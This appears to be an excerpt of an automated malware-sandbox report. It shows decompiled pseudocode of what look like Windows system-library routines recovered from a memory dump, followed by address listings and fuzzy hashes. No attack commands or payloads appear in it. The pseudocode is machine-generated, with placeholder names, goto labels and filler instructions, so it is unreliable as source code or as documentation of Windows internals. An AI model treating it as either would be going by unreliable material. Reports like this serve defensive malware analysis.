					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0xadff00);
					E00A5D08C(_t285, _t323, _t328);
					_v44 =  *[fs:0x18];
					_t324 = 0;
					 *_a24 = 0;
					_t286 = _a12;
					__eflags = _t286;
					if(_t286 == 0) {
						_t249 = 0xc0000100;
					} else {
						_v8 = 0;
						_t331 = 0xc0000100;
						_v52 = 0xc0000100;
						_t251 = 4;
						while(1) {
							_v40 = _t251;
							__eflags = _t251;
							if(_t251 == 0) {
								break;
							}
							_t299 = _t251 * 0xc;
							_v48 = _t299;
							__eflags = _t286 -  *((intOrPtr*)(_t299 + 0x9e1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t266 = E00A4E5C0(_a8,  *((intOrPtr*)(_t299 + 0x9e1668)), _t286);
									_t336 = _t336 + 0xc;
									__eflags = _t266;
									if(__eflags == 0) {
										_t331 = E00A851BE(_t286,  *((intOrPtr*)(_v48 + 0x9e166c)), _a16, _t324, _t331, __eflags, _a20, _a24);
										_v52 = _t331;
										break;
									} else {
										_t251 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t251 = _t251 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t331;
						__eflags = _t331;
						if(_t331 < 0) {
							__eflags = _t331 - 0xc0000100;
							if(_t331 == 0xc0000100) {
								_t295 = _a4;
								__eflags = _t295;
								if(_t295 != 0) {
									_v36 = _t295;
									__eflags =  *_t295 - _t324;
									if( *_t295 == _t324) {
										_t331 = 0xc0000100;
										goto L76;
									} else {
										_t312 =  *((intOrPtr*)(_v44 + 0x30));
										_t253 =  *((intOrPtr*)(_t312 + 0x10));
										__eflags =  *((intOrPtr*)(_t253 + 0x48)) - _t295;
										if( *((intOrPtr*)(_t253 + 0x48)) == _t295) {
											__eflags =  *(_t312 + 0x1c);
											if( *(_t312 + 0x1c) == 0) {
												L106:
												_t331 = E00A32AE4( &_v36, _a8, _t286, _a16, _a20, _a24);
												_v32 = _t331;
												__eflags = _t331 - 0xc0000100;
												if(_t331 != 0xc0000100) {
													goto L69;
												} else {
													_t324 = 1;
													_t295 = _v36;
													goto L75;
												}
											} else {
												_t256 = E00A16600( *(_t312 + 0x1c));
												__eflags = _t256;
												if(_t256 != 0) {
													goto L106;
												} else {
													_t295 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t331 = E00A32C50(_t295, _a8, _t286, _a16, _a20, _a24, _t324);
											L76:
											_v32 = _t331;
											goto L69;
										}
									}
									goto L108;
								} else {
									E00A1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t331 = _a24;
									_t263 = E00A32AE4( &_v36, _a8, _t286, _a16, _a20, _t331);
									_v32 = _t263;
									__eflags = _t263 - 0xc0000100;
									if(_t263 == 0xc0000100) {
										_v32 = E00A32C50(_v36, _a8, _t286, _a16, _a20, _t331, 1);
									}
									_v8 = _t324;
									E00A32ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t249 = _t331;
					}
					L70:
					return E00A5D0D1(_t249);
				}
				L108:
			}



















































                                                                                                                          0x00a32584
                                                                                                                          0x00a32586
                                                                                                                          0x00a32590
                                                                                                                          0x00a32596
                                                                                                                          0x00a32597
                                                                                                                          0x00a32598
                                                                                                                          0x00a32599
                                                                                                                          0x00a3259e
                                                                                                                          0x00a325a4
                                                                                                                          0x00a325a9
                                                                                                                          0x00a325ac
                                                                                                                          0x00a325ae
                                                                                                                          0x00a325b1
                                                                                                                          0x00a325b2
                                                                                                                          0x00a325b5
                                                                                                                          0x00a325b8
                                                                                                                          0x00a325bb
                                                                                                                          0x00a325bc
                                                                                                                          0x00a325bf
                                                                                                                          0x00a325c2
                                                                                                                          0x00a325c5
                                                                                                                          0x00a325c6
                                                                                                                          0x00a325cb
                                                                                                                          0x00a325ce
                                                                                                                          0x00a325d8
                                                                                                                          0x00a325dd
                                                                                                                          0x00a325de
                                                                                                                          0x00a325e1
                                                                                                                          0x00a325e3
                                                                                                                          0x00a325e9
                                                                                                                          0x00a326da
                                                                                                                          0x00a326da
                                                                                                                          0x00a326dd
                                                                                                                          0x00a326e2
                                                                                                                          0x00a75b56
                                                                                                                          0x00000000
                                                                                                                          0x00a326e8
                                                                                                                          0x00a326f9
                                                                                                                          0x00a326fb
                                                                                                                          0x00a326fe
                                                                                                                          0x00a32700
                                                                                                                          0x00a75b60
                                                                                                                          0x00000000
                                                                                                                          0x00a32706
                                                                                                                          0x00a32706
                                                                                                                          0x00a3270a
                                                                                                                          0x00a3270a
                                                                                                                          0x00a3270d
                                                                                                                          0x00a32713
                                                                                                                          0x00a32716
                                                                                                                          0x00a32718
                                                                                                                          0x00a3271c
                                                                                                                          0x00a3271e
                                                                                                                          0x00a75b6c
                                                                                                                          0x00a75b6f
                                                                                                                          0x00a75b7f
                                                                                                                          0x00a75b89
                                                                                                                          0x00a75b8e
                                                                                                                          0x00a75b93
                                                                                                                          0x00a75b96
                                                                                                                          0x00a75b9c
                                                                                                                          0x00a75ba0
                                                                                                                          0x00a75ba3
                                                                                                                          0x00a75bab
                                                                                                                          0x00a75bb0
                                                                                                                          0x00a75bb3
                                                                                                                          0x00a75bb3
                                                                                                                          0x00a75ba3
                                                                                                                          0x00a32724
                                                                                                                          0x00a32726
                                                                                                                          0x00a32729
                                                                                                                          0x00a3272c
                                                                                                                          0x00a3279d
                                                                                                                          0x00a3279d
                                                                                                                          0x00a327a0
                                                                                                                          0x00a327a2
                                                                                                                          0x00000000
                                                                                                                          0x00a3272e
                                                                                                                          0x00a3272e
                                                                                                                          0x00a32731
                                                                                                                          0x00a32734
                                                                                                                          0x00a32734
                                                                                                                          0x00a32736
                                                                                                                          0x00a75bc1
                                                                                                                          0x00a75bc1
                                                                                                                          0x00a75bc4
                                                                                                                          0x00000000
                                                                                                                          0x00a75bca
                                                                                                                          0x00a75bca
                                                                                                                          0x00a75bcd
                                                                                                                          0x00000000
                                                                                                                          0x00a75bd3
                                                                                                                          0x00000000
                                                                                                                          0x00a75bd3
                                                                                                                          0x00a75bcd
                                                                                                                          0x00a3273c
                                                                                                                          0x00a3273c
                                                                                                                          0x00a32742
                                                                                                                          0x00a32747
                                                                                                                          0x00a3274a
                                                                                                                          0x00a3274d
                                                                                                                          0x00a32750
                                                                                                                          0x00000000
                                                                                                                          0x00a32756
                                                                                                                          0x00a32756
                                                                                                                          0x00000000
                                                                                                                          0x00a32902
                                                                                                                          0x00a32908
                                                                                                                          0x00a3290b
                                                                                                                          0x00000000
                                                                                                                          0x00a32911
                                                                                                                          0x00a3291c
                                                                                                                          0x00a32921
                                                                                                                          0x00000000
                                                                                                                          0x00a32921
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32880
                                                                                                                          0x00a32887
                                                                                                                          0x00a3288c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32805
                                                                                                                          0x00a3280a
                                                                                                                          0x00a32814
                                                                                                                          0x00a32816
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a3281e
                                                                                                                          0x00a32821
                                                                                                                          0x00a32823
                                                                                                                          0x00000000
                                                                                                                          0x00a32829
                                                                                                                          0x00a32829
                                                                                                                          0x00a32831
                                                                                                                          0x00a3283c
                                                                                                                          0x00a3283e
                                                                                                                          0x00000000
                                                                                                                          0x00a3283e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a3284e
                                                                                                                          0x00a32850
                                                                                                                          0x00a32851
                                                                                                                          0x00a32854
                                                                                                                          0x00a32857
                                                                                                                          0x00a3285a
                                                                                                                          0x00a3285c
                                                                                                                          0x00a3285d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a3275d
                                                                                                                          0x00a32761
                                                                                                                          0x00000000
                                                                                                                          0x00a32767
                                                                                                                          0x00a3276e
                                                                                                                          0x00a32773
                                                                                                                          0x00a32773
                                                                                                                          0x00a32776
                                                                                                                          0x00a32778
                                                                                                                          0x00a3277e
                                                                                                                          0x00a3277e
                                                                                                                          0x00a32781
                                                                                                                          0x00a32781
                                                                                                                          0x00a32783
                                                                                                                          0x00a32784
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a75bd8
                                                                                                                          0x00a75bde
                                                                                                                          0x00a75be4
                                                                                                                          0x00a75be6
                                                                                                                          0x00a75be8
                                                                                                                          0x00a75be9
                                                                                                                          0x00a75bee
                                                                                                                          0x00a75bf8
                                                                                                                          0x00a75bff
                                                                                                                          0x00a75c01
                                                                                                                          0x00a75c04
                                                                                                                          0x00a75c07
                                                                                                                          0x00a75c0b
                                                                                                                          0x00a75c0d
                                                                                                                          0x00a75c0d
                                                                                                                          0x00a75c15
                                                                                                                          0x00a75c18
                                                                                                                          0x00a75c1b
                                                                                                                          0x00a75c1b
                                                                                                                          0x00a75c1e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a328c3
                                                                                                                          0x00a328c8
                                                                                                                          0x00a328d2
                                                                                                                          0x00a328d4
                                                                                                                          0x00a328d8
                                                                                                                          0x00a328db
                                                                                                                          0x00a75c26
                                                                                                                          0x00a75c28
                                                                                                                          0x00a75c2d
                                                                                                                          0x00a75c2d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a75c34
                                                                                                                          0x00a75c36
                                                                                                                          0x00a75c49
                                                                                                                          0x00a75c4e
                                                                                                                          0x00a75c54
                                                                                                                          0x00a75c5b
                                                                                                                          0x00a75c5d
                                                                                                                          0x00a75c60
                                                                                                                          0x00a32788
                                                                                                                          0x00a32788
                                                                                                                          0x00a3278b
                                                                                                                          0x00a3278e
                                                                                                                          0x00a3278e
                                                                                                                          0x00a3278e
                                                                                                                          0x00a32791
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32756
                                                                                                                          0x00a32750
                                                                                                                          0x00000000
                                                                                                                          0x00a32794
                                                                                                                          0x00a32794
                                                                                                                          0x00a32795
                                                                                                                          0x00a32798
                                                                                                                          0x00a32798
                                                                                                                          0x00000000
                                                                                                                          0x00a32734
                                                                                                                          0x00a3272c
                                                                                                                          0x00a32700
                                                                                                                          0x00a325ef
                                                                                                                          0x00a325ef
                                                                                                                          0x00a325ef
                                                                                                                          0x00a325f2
                                                                                                                          0x00a325f8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a325fe
                                                                                                                          0x00000000
                                                                                                                          0x00a328e6
                                                                                                                          0x00a328ec
                                                                                                                          0x00a328ef
                                                                                                                          0x00a328f5
                                                                                                                          0x00a328f8
                                                                                                                          0x00a328f8
                                                                                                                          0x00000000
                                                                                                                          0x00a328f8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32866
                                                                                                                          0x00a32866
                                                                                                                          0x00a32876
                                                                                                                          0x00a32879
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a327e0
                                                                                                                          0x00a327e7
                                                                                                                          0x00a327e9
                                                                                                                          0x00a327eb
                                                                                                                          0x00a75afd
                                                                                                                          0x00000000
                                                                                                                          0x00a75afd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32633
                                                                                                                          0x00a32638
                                                                                                                          0x00a3263b
                                                                                                                          0x00a3263c
                                                                                                                          0x00a3263e
                                                                                                                          0x00a32640
                                                                                                                          0x00a32642
                                                                                                                          0x00a32647
                                                                                                                          0x00a32649
                                                                                                                          0x00a3264e
                                                                                                                          0x00a32650
                                                                                                                          0x00a32653
                                                                                                                          0x00a32659
                                                                                                                          0x00a326a2
                                                                                                                          0x00a326a7
                                                                                                                          0x00a326ac
                                                                                                                          0x00a326b2
                                                                                                                          0x00a75b11
                                                                                                                          0x00a75b15
                                                                                                                          0x00a75b17
                                                                                                                          0x00000000
                                                                                                                          0x00a326b8
                                                                                                                          0x00a326b8
                                                                                                                          0x00a326ba
                                                                                                                          0x00a327a6
                                                                                                                          0x00a327a6
                                                                                                                          0x00a327a9
                                                                                                                          0x00a327ab
                                                                                                                          0x00a327b9
                                                                                                                          0x00a327b9
                                                                                                                          0x00a327be
                                                                                                                          0x00a327c1
                                                                                                                          0x00a327c3
                                                                                                                          0x00a327c5
                                                                                                                          0x00a327c7
                                                                                                                          0x00a75c74
                                                                                                                          0x00a75c79
                                                                                                                          0x00a75c79
                                                                                                                          0x00a327c7
                                                                                                                          0x00000000
                                                                                                                          0x00a326c0
                                                                                                                          0x00a326c0
                                                                                                                          0x00a326c3
                                                                                                                          0x00a326c6
                                                                                                                          0x00a326c6
                                                                                                                          0x00a326c9
                                                                                                                          0x00a326c9
                                                                                                                          0x00000000
                                                                                                                          0x00a326c9
                                                                                                                          0x00a326ba
                                                                                                                          0x00a3265b
                                                                                                                          0x00a3265b
                                                                                                                          0x00a3265e
                                                                                                                          0x00a32667
                                                                                                                          0x00a3266d
                                                                                                                          0x00a32677
                                                                                                                          0x00a3267c
                                                                                                                          0x00a3267f
                                                                                                                          0x00a32681
                                                                                                                          0x00a75b49
                                                                                                                          0x00a75b4e
                                                                                                                          0x00a327cd
                                                                                                                          0x00a327d0
                                                                                                                          0x00a327d1
                                                                                                                          0x00a327d2
                                                                                                                          0x00a327d4
                                                                                                                          0x00a327dd
                                                                                                                          0x00a32687
                                                                                                                          0x00a32687
                                                                                                                          0x00a3268a
                                                                                                                          0x00a3268b
                                                                                                                          0x00a3268e
                                                                                                                          0x00a3268f
                                                                                                                          0x00a32691
                                                                                                                          0x00a32696
                                                                                                                          0x00a32698
                                                                                                                          0x00a3269d
                                                                                                                          0x00a3269f
                                                                                                                          0x00000000
                                                                                                                          0x00a3269f
                                                                                                                          0x00a32681
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32846
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32605
                                                                                                                          0x00a3260a
                                                                                                                          0x00a3260c
                                                                                                                          0x00a32611
                                                                                                                          0x00a32616
                                                                                                                          0x00a32619
                                                                                                                          0x00a32619
                                                                                                                          0x00a3261e
                                                                                                                          0x00000000
                                                                                                                          0x00a32624
                                                                                                                          0x00a32627
                                                                                                                          0x00a32627
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a75b1f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32894
                                                                                                                          0x00a3289b
                                                                                                                          0x00a3289d
                                                                                                                          0x00a328a1
                                                                                                                          0x00a75b2b
                                                                                                                          0x00a75b2e
                                                                                                                          0x00a75b2e
                                                                                                                          0x00a328a7
                                                                                                                          0x00a328a9
                                                                                                                          0x00a75b04
                                                                                                                          0x00a75b09
                                                                                                                          0x00a75b09
                                                                                                                          0x00a75b09
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a75b35
                                                                                                                          0x00a75b3c
                                                                                                                          0x00a328fb
                                                                                                                          0x00a328fb
                                                                                                                          0x00a326cc
                                                                                                                          0x00a326cc
                                                                                                                          0x00a326d0
                                                                                                                          0x00000000
                                                                                                                          0x00a326d2
                                                                                                                          0x00a326d2
                                                                                                                          0x00000000
                                                                                                                          0x00a326d2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a325fe
                                                                                                                          0x00a3292d
                                                                                                                          0x00a3292f
                                                                                                                          0x00a32930
                                                                                                                          0x00a32935
                                                                                                                          0x00a32937
                                                                                                                          0x00a3293c
                                                                                                                          0x00a3293e
                                                                                                                          0x00a3293f
                                                                                                                          0x00a32944
                                                                                                                          0x00a32947
                                                                                                                          0x00a3294c
                                                                                                                          0x00a3294e
                                                                                                                          0x00a3294f
                                                                                                                          0x00a32950
                                                                                                                          0x00a32957
                                                                                                                          0x00a32958
                                                                                                                          0x00a3295a
                                                                                                                          0x00a32962
                                                                                                                          0x00a32963
                                                                                                                          0x00a32968
                                                                                                                          0x00a3296b
                                                                                                                          0x00a32972
                                                                                                                          0x00a32973
                                                                                                                          0x00a32974
                                                                                                                          0x00a3297b
                                                                                                                          0x00a3297e
                                                                                                                          0x00a3297f
                                                                                                                          0x00a32980
                                                                                                                          0x00a32981
                                                                                                                          0x00a32982
                                                                                                                          0x00a32983
                                                                                                                          0x00a32984
                                                                                                                          0x00a32985
                                                                                                                          0x00a32986
                                                                                                                          0x00a32987
                                                                                                                          0x00a32988
                                                                                                                          0x00a32989
                                                                                                                          0x00a3298a
                                                                                                                          0x00a3298b
                                                                                                                          0x00a3298c
                                                                                                                          0x00a3298d
                                                                                                                          0x00a3298e
                                                                                                                          0x00a3298f
                                                                                                                          0x00a32990
                                                                                                                          0x00a32992
                                                                                                                          0x00a32997
                                                                                                                          0x00a329a3
                                                                                                                          0x00a329a6
                                                                                                                          0x00a329ab
                                                                                                                          0x00a329ad
                                                                                                                          0x00a329b0
                                                                                                                          0x00a329b2
                                                                                                                          0x00a75c80
                                                                                                                          0x00a329b8
                                                                                                                          0x00a329b8
                                                                                                                          0x00a329bb
                                                                                                                          0x00a329c0
                                                                                                                          0x00a329c5
                                                                                                                          0x00a329c6
                                                                                                                          0x00a329c6
                                                                                                                          0x00a329c9
                                                                                                                          0x00a329cb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a329cd
                                                                                                                          0x00a329d0
                                                                                                                          0x00a329d9
                                                                                                                          0x00a329db
                                                                                                                          0x00a329dd
                                                                                                                          0x00a32a7f
                                                                                                                          0x00a32a84
                                                                                                                          0x00a32a87
                                                                                                                          0x00a32a89
                                                                                                                          0x00a75ca1
                                                                                                                          0x00a75ca3
                                                                                                                          0x00000000
                                                                                                                          0x00a32a8f
                                                                                                                          0x00a32a8f
                                                                                                                          0x00000000
                                                                                                                          0x00a32a8f
                                                                                                                          0x00000000
                                                                                                                          0x00a329e3
                                                                                                                          0x00a329e3
                                                                                                                          0x00a329e3
                                                                                                                          0x00000000
                                                                                                                          0x00a329e3
                                                                                                                          0x00a329dd
                                                                                                                          0x00000000
                                                                                                                          0x00a329db
                                                                                                                          0x00a329e6
                                                                                                                          0x00a329e9
                                                                                                                          0x00a329eb
                                                                                                                          0x00a329ed
                                                                                                                          0x00a329f3
                                                                                                                          0x00a329f5
                                                                                                                          0x00a329f8
                                                                                                                          0x00a329fa
                                                                                                                          0x00a32a97
                                                                                                                          0x00a32a9a
                                                                                                                          0x00a32a9d
                                                                                                                          0x00a32add
                                                                                                                          0x00000000
                                                                                                                          0x00a32a9f
                                                                                                                          0x00a32aa2
                                                                                                                          0x00a32aa5
                                                                                                                          0x00a32aa8
                                                                                                                          0x00a32aab
                                                                                                                          0x00a75cab
                                                                                                                          0x00a75caf
                                                                                                                          0x00a75cc5
                                                                                                                          0x00a75cda
                                                                                                                          0x00a75cdc
                                                                                                                          0x00a75cdf
                                                                                                                          0x00a75ce5
                                                                                                                          0x00000000
                                                                                                                          0x00a75ceb
                                                                                                                          0x00a75ced
                                                                                                                          0x00a75cee
                                                                                                                          0x00000000
                                                                                                                          0x00a75cee
                                                                                                                          0x00a75cb1
                                                                                                                          0x00a75cb4
                                                                                                                          0x00a75cb9
                                                                                                                          0x00a75cbb
                                                                                                                          0x00000000
                                                                                                                          0x00a75cbd
                                                                                                                          0x00a75cbd
                                                                                                                          0x00000000
                                                                                                                          0x00a75cbd
                                                                                                                          0x00a75cbb
                                                                                                                          0x00a32ab1
                                                                                                                          0x00a32ab1
                                                                                                                          0x00a32ac4
                                                                                                                          0x00a32ac6
                                                                                                                          0x00a32ac6
                                                                                                                          0x00000000
                                                                                                                          0x00a32ac6
                                                                                                                          0x00a32aab
                                                                                                                          0x00000000
                                                                                                                          0x00a32a00
                                                                                                                          0x00a32a09
                                                                                                                          0x00a32a0e
                                                                                                                          0x00a32a21
                                                                                                                          0x00a32a24
                                                                                                                          0x00a32a35
                                                                                                                          0x00a32a3a
                                                                                                                          0x00a32a3d
                                                                                                                          0x00a32a42
                                                                                                                          0x00a32a59
                                                                                                                          0x00a32a59
                                                                                                                          0x00a32a5c
                                                                                                                          0x00a32a5f
                                                                                                                          0x00a32a5f
                                                                                                                          0x00a329fa
                                                                                                                          0x00a329f3
                                                                                                                          0x00a32a64
                                                                                                                          0x00a32a64
                                                                                                                          0x00a32a6b
                                                                                                                          0x00a32a6b
                                                                                                                          0x00a32a6d
                                                                                                                          0x00a32a72
                                                                                                                          0x00a32a72
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: PATH
                                                                                                                          • API String ID: 0-1036084923
                                                                                                                          • Opcode ID: daccbff049bd59b87181359ea5bf77c14ed3f469f531f64fe04ed29ffa20a579
                                                                                                                          • Instruction ID: ab6e1018cd220ab61a959137abe79fe5937f8f6ea72be85a6300737bf6382c33
                                                                                                                          • Opcode Fuzzy Hash: daccbff049bd59b87181359ea5bf77c14ed3f469f531f64fe04ed29ffa20a579
                                                                                                                          • Instruction Fuzzy Hash: F0C16D75E002199FCB25DFA9D981BBDB7B5FF88700F148029F915AB250E774A942CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A3FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 80%
                                                                                                                          			E00A3FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E00A1EEF0(0xaf7b60);
					_t134 =  *0xaf7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0xaf7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0xaf7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E00A16D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E00A176E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E00AA8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E00A0B150();
													}
													_t116 = E00AA6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E00A175CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0xaf8638; // 0x0
																	_t122 = L00A138A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E00A176E2(_t154);
																			goto L41;
																		}
																	} else {
																		E00A176E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L00A3FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L00A170F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E00A3FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E00A3FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E00A3FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E00A3FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
